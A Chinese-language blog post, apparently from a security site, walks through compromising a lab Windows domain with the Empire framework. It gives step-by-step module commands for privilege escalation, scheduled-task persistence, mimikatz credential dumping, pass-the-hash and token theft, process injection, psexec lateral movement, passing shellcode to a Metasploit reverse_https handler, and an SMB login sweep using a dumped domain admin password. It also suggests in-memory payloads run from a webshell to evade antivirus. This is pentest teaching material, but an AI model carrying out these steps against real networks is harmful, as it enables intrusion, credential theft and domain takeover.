Empire實戰域滲透
0x01 寫在開始
上一篇文章只是單純的介紹了一些Empire的基本用法,但這麼強大的工具根本不是一篇文章可以說清楚的,就像Metasploit,如果我單純寫一篇文章給你,告訴你這就是Metasploit全部的用法了。但是,真正的實戰中,絕對是一臉蒙蔽的往著眼前的顯示器,我要用什麼命令?我接下來要用什麼模塊?類似這些問題就會在的腦海里迸發,可以說是徹底蒙蔽的狀態。
Empire也一樣,所以我就決定再寫一篇Empire的文章,在域滲透中的使用。這並不是真的域環境,通常在滲透測試中碰到的域環境肯定比我在本地測試的域環境要複雜的多。我並不是專業的運維人員,單單搭建就弄了一個早上,我主要目的是盡量多的給大家介紹Empire的功能模塊,讓大家盡量多的了解Empire,以至於不會在真正的測試環境中蒙蔽,當然這麼大的工具不是簡簡單單可以說請的,還需要大家共同的摸索。
0x02 域環境結構
域控:windows server 2012 ip:10.10.10.10
域內其他成員:
Windows 7 x32 ip:10.10.10.11
Windows 7 x64 ip:10.10.10.12
Windows 10 x64 ip:10.10.10.13
域環境結構圖:(求妹子畫得- -!)
0x03 擼起袖子干
首先得拿到一個shell,當然這個shell怎麼來的就看大家自行發揮了,你可以在webshell里直接執行用Empire生成的直接返回會話的shellcode,我也推薦這方法,別問我為啥,因為免殺,而且不會在對方機機器上產生什麼明顯的痕迹;當然你也可以上傳Metasploit的反彈馬,然後在shell下執行這條語句;你還可以在讓伺服器管理員幫你執行!
哈哈,開玩笑,這種方法不存在,總之方法很多了,大家自由發揮,我直接托代碼進去執行了。
拿到一個命令行之後,看看域環境內的主機數量以及看看有幾個域
執行命令:
Shell net viewShell net view /domain
這裡有一個地方需要注意的,再上一篇文章中說過,執行的如果不是Empire的命令,那麼這條命令會被解析為windows命令,但是當執行的命令有空格,就必須要用shell去執行。
接下來要做什麼?當然是提權了,當不知道用什麼方法來提權的時候,可以使用一個模塊來檢測系統,讓它告訴你應該用什麼辦法:
usemodule privesc/powerup/allchecks
看看設置,什麼都不用做,直接執行,它會給返回我們想要的
可以看到,它列出了很多方法,可以直接bypassuac來提權,來吧執行一下,bypassuac 監聽名
稍等幾秒鐘,就會返回一個更高許可權的shell。
如果你還想要更的許可權,可以使用一個模塊提升到系統許可權
usemodule persistence/elevated/schtasks
使用計劃任務來幫我提升到系統許可權
看看信息:
需要做的只是設置時間而已然後執行
set DailyTime 時間
Set Listener 監聽名
現在要做的事情就是等了,等時間到了返回具有更高許可權的shell
更高級的許可權已經回來了,這個時候,首先得知道內網中到底有幾台機器,還有就是他們的ip,要不怎麼繼續盡享下去囊?那種小事情則么可能是Empire模塊不自帶的事情囊?可以尋找一下模塊
searchmodule arpscan
立馬,Empire就回顯了,並且提示了它的用處
usemodule situational_awareness/network/arpscan
設置一下要掃描的網段
set Range 10.10.10.10-10.10.10.30
執行就好了
掃描速度還是很快的,既然已經有許可權了,那可以執行mimikatz來拿到當前靶機的帳號密碼了,mimikatz的執行效果就不給了,等mimikatz執行完成以後直接creds來看Empire列舉好的密碼就好了。
發現還有域用戶在這台機器上登錄了,密碼已明文的形式顯示出來了,可以看到有4個用戶密碼出來了(尼瑪,域管都讀出來了,環境沒配好,假裝沒有 ^_^!),知道誰登陸了,也有許可權了,那自然可以竊取身份用戶了嗎!然後進行橫向移動,來吧,先身份竊取吧,使用pth 這裡的ID號就添上面的用creds 命令拿到的CredID,注意,這裡必須要是hash的CredID,不可以是明文的,來竊取smilewin7x64身份令牌
執行 pth 命令返回PID進程號
可以看到這個用戶的進程號,
steal_token PID
就可以竊取身份令牌了,可是這裡我就日了狗了,命令就是沒回顯,完全是突發情況,沒辦法,給大家換一個思路,是使用進程注入模塊,來獲取許可權
usemodule management/psinject
需要設置的就是ProcID 和 Listener就好了
set ProcId 2912
set Listener smiletest
設置好後執行,會返回一個新的會話
###你們想知道剛剛發生了什麼嗎?機器屏幕黑了一下,然後虛擬機去外加終端全部關掉了。有鎚子么?還好我的文檔隨手保存,因為我曾經寫500多行的代碼沒有保存,學機靈的,所以,大家也要養成隨手ctrl+s.....題外話,我去整環境,重新來,唉。。
因為網路斷掉,剛剛的數據有緩存,所以PID進程號碼不對,大家可以清理一下緩存,重新執行,我的話懶,介紹新方法:
usemodule credentials/tokens
信息什麼都不需要設置,直接執行
然後方法一樣,進程注入
哈哈,成功拿到會話後,加下來做什麼?當然是橫向移動了,看看能不能用這個用戶名拿到其他的機器。當然了,在滲透過程中直接模擬域管就好了,我這是為了跟大家演示,大家不要向我學習,這麼傻的做無用功啊 ^_^!
其實這裡我是知道可以登錄哪裡的機器的,但是想要尋找域管在哪裡登錄的,然後橫向移動進去,竊取域管許可權,不就可以拿到整個域了,我在這裡提一下要怎麼尋找域管在哪裡登錄的,使用模塊
usemodule situational_awareness/network/powerview/user_hunter
也是powerview的模塊,大家肯定都用過,看看需要設置什麼
來橫向移動
usemodule situational_awareness/network/powerview/find_localadmin_access
查找整個域中全部的計算機名(實際上是powerview中的方法了)
什麼都不需要設置,直接執行
返回了全部的機器名,
usemodule lateral_movement/invoke_psexec
一樣,看看需要設置的東西
設置機器名和監聽就行,開擼
執行
成功,而且是系統許可權,那用相同的辦法,進程注入從而得到域用戶許可權
過程略過
直接到獲取到域用戶kzhl許可權
直接讀密碼了。滲透過程中可能讀不到,你都有域管許可權了,讀不到怕啥??
拿到了域管的密碼,做什麼?當然是迅速擴張了!
0x04 遷移進程到MSF實現smb迅速擴張
使用模塊
usemodule code_execution/invoke_shellcode
設置方法如下
set Lhost 10.10.10.1
set Lport 4444
在Metasploit設置監聽
(用Empire用了一晚上,在重返Metasploit,我是誰?我要幹嘛?命令怎麼寫?模塊是什麼?)
這裡注意了,設置的payload必須是http或https的
use exploit/multi/handler
Set payload windows/meterpreter/reverse_https
set lport 4444
exploit
成功返回會話,接下來使用msf進行內網迅速擴張
use auxiliary/scanner/smb/smb_login
set rhosts 10.10.10.0/24
set smbuser kzhl
set smbpass admin888.
set smbdomain TT
set threads 16
Exploit
恭喜我,擼穿了整個域。。。
0x05 收穫到的一些神奇的想法
我並沒有去測試這些方法的可行性,只是異想天開的在腦海里呈現的一些思路。
1.當我們拿到webshell的時候,苦惱在目標機上的殺軟,無法繞過,可以使用webshell去執行Empire的payload,他直接執行在內存中,殺軟是沒有任何效果的,親測可行,之後在使用Empire的模塊將其反彈會Metasploit,實現了免殺的過程。
2.大家都知道,在Metasploit下的代理是很容易就可以設置的,但是Empire下則不然,很麻煩的一個東西,如果對方有殺軟,可以使用第一個小思路繞過之後,在通過Metasploit添加代理,然後在配置proxychains,使用proxychainx來幫助Empire殺入內網,當然你也可以使用其他的工具,大家如果對代理的使用不是很了解的話,可以參見shutter老哥的一篇文章。
0x06 總結在最後
全文的邏輯和問題比較多,但是基本上給大家比較全面的介紹了Empire這款神器在真正滲透過程中的使用,我想通過這篇文章大家肯定對Empire有一個比較全面的了解,他牛的地方就用它,他弱的地方,用其他的工具輔助他。總之,工具是死的,人是活得。
哎呦,寫這篇文章我表示我真的好辛苦,在滲透過程中碰到了很多問題,不過基本都是環境配置的問題,畢竟我不是運維,不過好在我成功的寫完了全文。馬達,剛剛從公司回來的發現煙沒有了,現在終於寫完了這篇文章,趕緊下樓買包煙冷靜一下,這好幾點的也不知道還有便利店開門,你們懂幹活時候沒有煙的痛苦么??感覺思路都被限制了!我相信你們懂我 ^_^
※郵輪上的黑客大賽
※嘶吼專訪:面對「想哭」勒索軟體,你不知道的幾件事兒?
※「想哭」勒索軟體驚魂24小時
TAG:嘶吼RoarTalk |
※域滲透——Kerberoasting
※靶機滲透測試實戰-hack the ch4inrulz
※iOS滲透測試工具Part 1:App Decryption以及class-dump
※powershell滲透框架
※域滲透——AS-REP Roasting
※Aqua推出開源Kubernetes滲透測試工具Kube-hunter
※高級域滲透技術之再談Kerberoast攻擊
※百年老牌要如何滲透潮流市場?| 專訪 New Balance CEO Robert T. DeMartini
※Huntpad:為滲透測試人員設計的Notepad應用
※CrackMapExec:一款針對大型Windows活動目錄(AD)的後滲透工具
※滲透技巧——利用Masterkey離線導出Chrome瀏覽器中保存的密碼
※滲透技巧——Junction Folders和Library Files的後門利用
※kali linu滲透系統.md
※Web Service和Web API滲透測試指南(一)
※Scrounger:iOS和Android移動應用程序滲透測試框架
※滲透技巧——Windows中net session的利用
※高級域滲透技術之傳遞哈希已死-LocalAccountTokenFilterPolicy萬歲
※滲透技巧——Windows下NTFS文件的USN Journal
※滲透技巧——獲取Windows系統下DPAPI中的MasterKey
※Windows ADS在滲透測試中的妙用